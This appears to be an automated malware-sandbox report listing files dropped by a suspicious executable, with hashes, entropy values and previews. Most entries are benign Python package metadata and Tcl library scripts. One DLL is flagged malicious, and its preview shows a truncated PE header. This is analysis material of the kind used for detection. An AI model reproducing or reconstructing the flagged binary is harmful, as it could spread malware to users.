                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                                              Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                              MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                              SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                              SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                              SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2153
                                                                                                                                                                                                                              Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                              MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                              SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                              SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                              SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                              MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                              SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                              SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                              SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                              Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                              MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                              SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                              SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                              SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3575
                                                                                                                                                                                                                              Entropy (8bit):5.085545958857746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:D0h4aC/S802Vpnu3pyt1Q+/+DeVb0ksYSwTgD:Oc/z02Vpnu3pytS+2DeVNfSwTW
                                                                                                                                                                                                                              MD5:F659E7F578CE6FD3753871DBBBA1F939
                                                                                                                                                                                                                              SHA1:C53B0E6A2E3D94093E2FE4978926A7439B47D43C
                                                                                                                                                                                                                              SHA-256:508AE4FE43081C64B0B0A2828588B3A8CC3430C6693D1676662569400B0DFDB1
                                                                                                                                                                                                                              SHA-512:2C0496B76D259259A8F1E57F3ED2224A7E3E99FF309F764C00A8377BB5BD1C94035BDDF24BD1BA637209677CB9F4E8109F84C50B3488B5B8FC372B6BEDAB9AE0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: zipp.Version: 3.19.2.Summary: Backport of pathlib-compatible object wrapper for zip files.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/zipp.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: test.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'test'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'test'.Requir
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1039
                                                                                                                                                                                                                              Entropy (8bit):5.8094923667268965
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:An/2zDlvbqfuiwbWk/EsJ6Xam9lpW8OWq3tW36nJA3u3iWwksYW:AnuXlzUuitk/5J6f9lpW8OW4tM6nJSkE
                                                                                                                                                                                                                              MD5:1E77310EF3277C93430D969FEAC8FDFC
                                                                                                                                                                                                                              SHA1:173240337F249E2A6D54206AA0D0ACB0FDED12D7
                                                                                                                                                                                                                              SHA-256:F316F2E03FD9ADE7EBBC0B154706848E2BB8FD568B90935109F0D8E3CE2B9BFE
                                                                                                                                                                                                                              SHA-512:68F752DAF2DBEB79644337E4DB9B8CEAEAE3606A865EDC32BE16785DC97BDCF38EF200F0EDC86DC9D71ABA72E108D2851A510F0EB598FFEA286503F0C9772E5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:zipp-3.19.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..zipp-3.19.2.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..zipp-3.19.2.dist-info/METADATA,sha256=UIrk_kMIHGSwsKKChYizqMw0MMZpPRZ2ZiVpQAsN_bE,3575..zipp-3.19.2.dist-info/RECORD,,..zipp-3.19.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp-3.19.2.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..zipp-3.19.2.dist-info/top_level.txt,sha256=iAbdoSHfaGqBfVb2XuR9JqSQHCoOsOtG6y9C_LSpqFw,5..zipp/__init__.py,sha256=QuI1g00G4fRAcGt-HqbV0oWIkmSgedCGGYsHHYzNa8A,13412..zipp/__pycache__/__init__.cpython-312.pyc,,..zipp/__pycache__/glob.cpython-312.pyc,,..zipp/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp/compat/__pycache__/__init__.cpython-312.pyc,,..zipp/compat/__pycache__/py310.cpython-312.pyc,,..zipp/compat/py310.py,sha256=eZpkW0zRtunkhEh8jjX3gCGe22emoKCBJw72Zt4RkhA,219..zipp/glob.py,sha256=etWpnfEoRyf
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5
                                                                                                                                                                                                                              Entropy (8bit):1.9219280948873623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:m:m
                                                                                                                                                                                                                              MD5:9B929466EC7848714DE24BCF75AE57CB
                                                                                                                                                                                                                              SHA1:ECC9237295CDA9B690BE094E58FAE1458A4B0389
                                                                                                                                                                                                                              SHA-256:8806DDA121DF686A817D56F65EE47D26A4901C2A0EB0EB46EB2F42FCB4A9A85C
                                                                                                                                                                                                                              SHA-512:C8D8967BE2B5094A5D72BA4BEF5DBDA2CBF539BF3B8B916CF86854087A12DF82B51B7BF5B6EFA79898692EFD22FAD9688058448CAAB198FB708A0E661DC685EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:zipp.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1816344
                                                                                                                                                                                                                              Entropy (8bit):6.495049871908257
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:CAZ2kQrvqkPY6i6ktWc2uMOxmWu1/0lglMkgshwlfjwtorWy2eMdPhOC9JlQ5ZDR:CA0W9jEoSy2nd9JlQjaq5vWHZ7XM2eDD
                                                                                                                                                                                                                              MD5:3AE729942D15F4F48B1EA8C91880F1F4
                                                                                                                                                                                                                              SHA1:D27596D14AF5ADEB02EDAB74859B763BF6AC2853
                                                                                                                                                                                                                              SHA-256:FE62CA2B01B0EC8A609B48F165CA9C6A91653D3966239243AD352DD4C8961760
                                                                                                                                                                                                                              SHA-512:355800E9152DAAD675428421B867B6D48E2C8F8BE9CA0284F221F27FAE198C8F07D90980E04D807B50A88F92FFB946DC53B7564E080E2E0684F7F6CCC84FF245
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......1.y+u..xu..xu..x...yw..x...xv..x...yx..x...y}..x...yq..x..yw..x|..xg..x...yt..x...yx..xu..x]..x...y...x...yt..x...xt..x...yt..xRichu..x........................PE..d...1,.c.........." ...!.............................................................j....`..............................................`.. _..h.......8................/..........................................`...@............0...............................text............................... ..`.rdata..|L...0...N..................@..@.data...."...........f..............@....pdata...............n..............@..@.rsrc...8............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11707
                                                                                                                                                                                                                              Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                              MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                              SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                              SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                              SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6218
                                                                                                                                                                                                                              Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                              MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                              SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                              SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                              SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35136
                                                                                                                                                                                                                              Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                              MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                              SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                              SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                              SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
